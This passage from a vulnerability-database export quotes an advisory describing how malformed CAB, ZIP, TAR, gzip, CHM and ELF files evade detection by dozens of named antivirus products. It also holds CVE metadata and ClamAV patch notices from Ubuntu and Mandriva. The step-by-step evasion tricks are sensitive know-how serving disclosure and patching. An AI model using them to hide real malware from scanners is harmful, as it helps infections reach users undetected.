\n\n   Affected products -\n   McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n   Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1454\n\n37. 'vMinor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n \n   CVE no - \n   CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n   of a clean TAR archive and a virus-infected ZIP archive, is parsed \n   incorrectly and evades detection. \n\n   Affected products -\n   AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1,\n   eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004\n\n   CVE no - \n   CVE-2012-1456\n\n39. If the length field in the header of a file with test EICAR virus\n   included into a TAR archive is set to be greater than the archive's total \n   length (1,000,000+original length in our experiments), the antivirus \n   declares the file to be clean but virus gets extracted correctly by the \n   GNU tar program. 
\n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n   AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n   Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n   GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n   Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n   scripts, and images compressed using the LZX algorithm. \n   For faster random accesses, the algorithm is reset at intervals\n   instead of compressing the entire file as a single stream. The\n   length of each interval is specified in the LZXC header. \n\n   If an infected CHM file's header modified so that the reset interval\n   is lower than in the original file, the antivirus declares the file\n   to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n   the infected content located before the tampered header. \n\n   Affected products -\n   ClamAV 0.96.4, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n   by a simple checksum. Every header also contains a file length field, which\n   is used by the extractor to locate the next header in the archive. \n\n   If a TAR archive contains two files: the first one is clean, while\n   the second is infected with test EICAR virus - and it is modified such that \n   the length field in the header of the first, clean file to point into the \n   middle of the header of the second, infected file. 
The antivirus declares \n   the file to be clean but virus gets extracted correctly by the \n   GNU tar program. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, \n   Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, \n   CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, \n   Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, \n   Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, \n   PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, \n   Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, \n   VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1459\n\n42. If an infected tar.gz archive is appended 6 random bytes at the end, \n    the antivirus declares the file to be clean but virus gets extracted by\n    the gunzip+tar programs correctly by ignoring these bytes. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n   \n   CVE no - \n   CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n    when the contents are extracted. 
If an infected .tar.gz file is broken \n    into two streams, the antivirus declares the infected .tar.gz file to \n    be clean while tar+gunzip extract the virus correctly\n\n   Affected products -\n   AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n   F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n   CVE no - \n   CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n   beginning, the antivirus declares the file to be clean but virus gets extracted\n   by the unzip program correctly by skipping these bytes\n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n   Symantec 20101.3.0.103 \n\n   CVE no - \n   CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n   for little-endian, 02 for bigendian. Linux kernel, however, does not\n   check this field before loading an ELF file. If an infected ELF file's 5-th \n   byte is set to 02, the antivirus declares the file to be clean but the ELF \n   file gets executed correctly. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n   CVE no - \n   CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. 
\n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
            trust: 2.9,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
            trust: 0.8,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19226",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
            trust: 0.6,
         },
         {
            db: "BID",
            id: "52580",
            trust: 0.4,
         },
         {
            db: "VULHUB",
            id: "VHN-54706",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "110990",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   id: "VAR-201203-0385",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.948000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.antiy.net/en/index.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/ja/for-home",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.fortinet.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.pctools.com/jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.symantec.com/ja/jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.kaspersky.co.jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.mcafee.com/japan/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1425",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1425",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19226",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1419",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1439",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1426",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1429",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1436",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1440",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1432",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1438",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1428",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1446",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1443",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1444",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1441",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1421",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1430",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1434",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1435",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1424",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1431",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1425",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1423",
         },
         {
            trust: 0.1,
            url: "http://www.ieee-security.org/tc/sp2012/",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1442",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1422",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1433",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1420",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1427",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1445",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1437",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52580",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            date: "2012-03-19T23:51:01",
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            date: "2012-03-21T10:11:47.397000",
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-08-14T00:00:00",
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            date: "2012-03-30T16:10:00",
            db: "BID",
            id: "52580",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            date: "2012-08-14T03:35:49.627000",
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Vulnerability in the TAR file parsers of multiple products that prevents malware detection",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0144
Vulnerability from variot

The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parser in multiple products contains a vulnerability that can prevent malware detection. This CVE may be split if it is announced that the problem also exists independently in different TAR parser implementations. A third party may bypass malware detection through a TAR archive entry whose length field corresponds to the full entry plus part of the header of the next entry. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. 
AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================ Ubuntu Security Notice USN-1482-2 June 20, 2012

clamav regression

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS
  • Ubuntu 11.10
  • Ubuntu 11.04

Summary:

ClamAV could improperly detect malware if it opened a specially crafted file.

Software Description: - clamav: Anti-virus utility for Unix

Details:

USN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail to install in certain situations. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)

It was discovered that ClamAV incorrectly handled certain malformed CHM files. A remote attacker could create a specially-crafted CHM file containing malware that could escape being detected. (CVE-2012-1458)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.2

Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.2

Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.2

In general, a standard system update will make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-1482-2 http://www.ubuntu.com/usn/usn-1482-1 https://launchpad.net/bugs/1015337

Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Mandriva Linux Security Advisory MDVSA-2012:094 http://www.mandriva.com/security/

Package : clamav Date : June 18, 2012 Affected: Enterprise Server 5.0

Problem Description:

This is a bugfix release that upgrades clamav to the latest version (0.97.5) that resolves the following security issues:

The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5

Updated Packages:

Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf OUr1QL5Wsvt3KboLKCdYUhE= =1QL7 -----END PGP SIGNATURE-----



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0144",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "virusbuster",
            scope: "eq",
            trust: 2.4,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.1,
            vendor: "comodo",
            version: "7424",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
